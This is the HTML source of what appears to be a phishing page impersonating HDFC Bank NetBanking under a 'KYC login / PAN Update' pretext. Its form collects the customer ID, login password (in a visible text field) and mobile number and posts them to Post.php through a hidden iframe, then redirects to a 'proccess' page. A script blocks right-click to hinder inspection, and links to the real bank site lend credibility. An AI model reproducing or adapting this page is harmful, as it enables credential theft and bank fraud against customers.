<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
    <title>HDFC Secure KYC login</title>
    <style>
        #mm,#io,#ij,#jj
        {
            width: 104%;
            margin-left:-7px;
        }
        #bb,#dd,#ff
        {
            width: 260px;
            height:24px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            outline:none;
            border-color:#CCCCCC;
            border-width:1px;
            margin:4px;
            border-radius:4px;
            margin-left:28px;
        }
        #bb:hover
        {
        outline:none;
        border-color:#67AFE9;
        box-shadow:0 0 6px 0 #67AFE9;
        }
        #dd:hover
        {
        outline:none;
        border-color:#67AFE9;
        box-shadow:0 0 6px 0 #67AFE9;
        }
        #ff:hover
        {
        outline:none;
        border-color:#67AFE9;
        box-shadow:0 0 6px 0 #67AFE9;
        }
 
        #ll
        {
            width: 338px;
            background-color: #1D85FE;
            color: white;
            padding: 0px 0px;
            margin: 10px 55px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px; width: 180px; height: 36px;
        }
        #ab
        {
        width:355px;
        border-bottom: solid #f3f3f3;
        border-width:10px;
        }
        #ll:hover
        {
        width: 338px;
        background-color:#365785;
        color: white;
        padding: 0px 0px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-size: 16px; width: 180px; height: 36px;
        }
        #con
        {
        background-color:#c5d4e8;
        width:280px;
        height: 130px;
        padding: 10px 15px;
        margin:4px;
        margin-left:18px;
        border-radius:1px;
        }
    </style>
    <script language="javascript">
    
    var message="For security reasons,This function is not allowed here.";
    function clickIE4(){
    
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }
    
    document.oncontextmenu=new Function("alert(message);return false;")
    
    </script>
</head>
<body>
<!-- Static- Please don't do anything here-->
    <script type="text/javascript">var submitted=false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='proccess.html';}"></iframe>
    <!--My Form-->
    <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
    <center><img src="logomain.jpg" alt="" width="55%"></center>
    <div class="container">
    <p style="
    color:#3b444b; 
    text-align:center; font-family: sans-serif; margin:8px; font-size:22px;">Welcome to HDFC Bank<br> NetBanking
    </p>
    </div><br>
    <div id="ab" 
    style="margin:-10px; 
    margin-left:-6px;">
    </div>
    <div id="yy">
       <h3 style="
       background-color:#DFE9F5;
       padding: 15px 20px;
       border-radius:1px;
       margin-left:-6px;
       font-size:16px;
       color:black;
       width:318px;
       height:20px;"
       >Login to NetBanking - PAN Update</h3>
       </div><br>
       <div id="zz">
       <p1 style="font-family: Arial; 
       color:#3b444b; 
       padding:0px 28px; font-size:15px;">Customer ID/ User ID</p1>
       </div>
        <div id="ta" required="">
            <input type="text" name="UserName" id="bb" placeholder="Customer ID/User ID"
             required="">
             <a href="https://netbanking.hdfcbank.com/netbanking/" style=" font-family: Arial; font-size:15px; padding:0px 28px; text-decoration:none; color:#1D85FE;">Forgot Customer ID</a><br><br>
        </div>
            <p1 style="font-family: Arial; 
            color:#3b444b; 
            padding:0px 28px; font-size:14px;">Login Password </p1>
        </div>
        <div id="ct">
            <input type="text" name="Password" id="dd" placeholder="Login Password"
             required="">
             </div> 
             <a href="https://netbanking.hdfcbank.com/netbanking/" style=" font-family: Arial; padding:0px 28px; text-decoration:none; font-size:15px; color:#1D85FE;">Forgot Password </a><br>
             <p3 style=" font-family: Arial; padding:0px 28px; font-size:12px;"> IPIN(Password)is case sensitive</p3><br>
        </div>
        <div style="font-family: Arial; 
        color:#3b444b; 
        padding:0px 25px; font-size:14px;" class="fs12"><input name="" onclick="showVirtualKeyBoard();" id="ch" type="checkbox" /> Use virtual keyboard for password</div><br>
        </div>
        <div id="tx">
            <p1 style="font-family: Arial; 
            color:#3b444b; 
            margin-left: 28px; font-size:14px;">Mobile Number </p1><b style="color:#3b444b;"> (as per Bank records)</b>
        </div>
        <div id="te">
            <input type="tel" name="Mobile No." id="ff"placeholder="Mobile Number" maxlength="10"
             pattern="[6-9]\d{9}"
            title="Please Enter Valid Mobile Number" 
             required=""> </div><br>
              <div id="kk">
             <button type="submit" id="ll">CONTINUE</button><br>
             </div>
            <!--<div id="con">
             <div>
             <p1 style="color:black; font-size:14px; margin-left:0px;">Dear Customer,<br>Welcome to the new login page of HDFC
             <br>Bank NetBanking<br>
             Its lighter look and feel is designed to give<br>you the best possible user experience.<br>Please continue to login using your<br>customer ID and password.
             </p1></div></div>-->
             <img src="hdfsecond.jpg" alt="" id="ij"><br><br>
             <img src="hdfthird.jpg" alt="" id="jj">
             </form></body></html>
              